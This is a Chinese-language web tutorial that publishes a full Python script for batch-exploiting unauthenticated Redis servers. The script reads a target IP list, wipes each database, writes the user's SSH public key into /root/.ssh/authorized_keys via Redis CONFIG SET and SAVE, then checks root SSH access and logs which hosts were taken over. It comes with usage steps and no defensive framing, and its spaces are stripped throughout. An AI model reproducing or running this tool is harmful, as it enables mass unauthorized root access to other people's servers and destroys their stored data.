python脚本实现Redis未授权批量提权
前言
本文主要给大家介绍了关于redis未授权批量提权的相关内容,分享出来供大家参考学习,下面话不多说了,来一起看看详细的介绍吧。
安装依赖
sudoeasy_installredis
使用
redispythonhackredis.py usage:hackredis.py[-h][-lIPLIST][-pPORT][-rID_RSAFILE][-spSSH_PORT] ForExample: ----------------------------------------------------------------------------- pythonhackredis.py-lip.txt-p6379-rfoo.txt-sp22 optionalarguments: -h,--helpshowthishelpmessageandexit -lIPLISTthehostsoftarget -pPORTtheredisdefaultport -rID_RSAFILEthesshid_rsafileyougenerate -spSSH_PORTthesshport
首先需要ssh密钥:
ssh-keygen-trsa cp~/.ssh/id_rsa.pub/tmp/foo.txt
之后将ip列表填入ip.txt,然后就可以跑了。成功的将会输出到success.txt,执行成功但是ssh连接失败的会存储在unconnect.txt,操作失败的会存储在fail.txt。
#!/usr/bin/python #coding:utf-8 ############################################################# ##@filehackredis.py## ##@date2015-12-11## ##@authorevi1cg## ############################################################# importredis importargparse importtextwrap importsys importpexpect defgetargs(): parser=argparse.ArgumentParser(prog='hackredis.py',formatter_class=argparse.RawTextHelpFormatter,description=textwrap.dedent('''/ ForExample: ----------------------------------------------------------------------------- pythonhackredis.py-lip.txt-p6379-rfoo.txt-sp22''')) parser.add_argument('-l',dest='iplist',type=str,help='thehostsoftarget') parser.add_argument('-p',dest='port',default=6379,type=int,help='theredisdefaultport') parser.add_argument('-r',dest='id_rsafile',type=str,help='thesshid_rsafileyougenerate') parser.add_argument('-sp',dest='ssh_port',type=int,default=22,help='thesshport') if(len(sys.argv[1:])/2!=4): sys.argv.append('-h') returnparser.parse_args() defhackredis(host,port): ck=0 try: print"[*]Attackingip:%s"%host r=redis.StrictRedis(host=host,port=port,db=0,socket_timeout=2) r.flushall r.set('crackit',foo) r.config_set('dir','/root/.ssh/') r.config_set('dbfilename','authorized_keys') r.save() ck=1 except: print"/033[1;31;40m[-]/033[0mSomethingwrongwith%s"%host write(host,2) ck=0 ifck==1: check(host) else: pass defcheck(host): print'/033[1;33;40m[*]/033[0mCheckconnecting...' try: ssh=pexpect.spawn('sshroot@%s-p%d'%(host,ssh_port)) i=ssh.expect('[#/$]',timeout=2) ifi==0: print"/033[1;34;40m[+]/033[0mSuccess!" write(host,1) else: pass except: print"/033[1;32;40m[-]/033[0mFailedtoconnect!" write(host,3) defwrite(host,suc): ifsuc==1: filesname='success.txt' elifsuc==2: filesname='fail.txt' elifsuc==3: filesname='unconnect.txt' else: pass file_object=open(filesname,'a') file_object.write(host+'/n') file_object.close() defmain(): globalfoo,ssh_port paramsargs=getargs() try: hosts=open(paramsargs.iplist,"r") except(IOError): print"Error:Checkyourhostfilepath/n" sys.exit(1) port=paramsargs.port ssh_port=paramsargs.ssh_port try: foo='/n/n/n'+open(paramsargs.id_rsafile,"r").readline()+'/n/n/n' except(IOError): print"Error:Checkyourwordlistpath/n" sys.exit(1) ips=[p.replace('/n','')forpinhosts] foripinips: hackredis(ip.strip(),port) if__name__=="__main__": main()
总结
以上就是这篇文章的全部内容了,希望本文的内容对大家的学习或者工作能带来一定的帮助,如果有疑问大家可以留言交流,谢谢大家对毛票票的支持。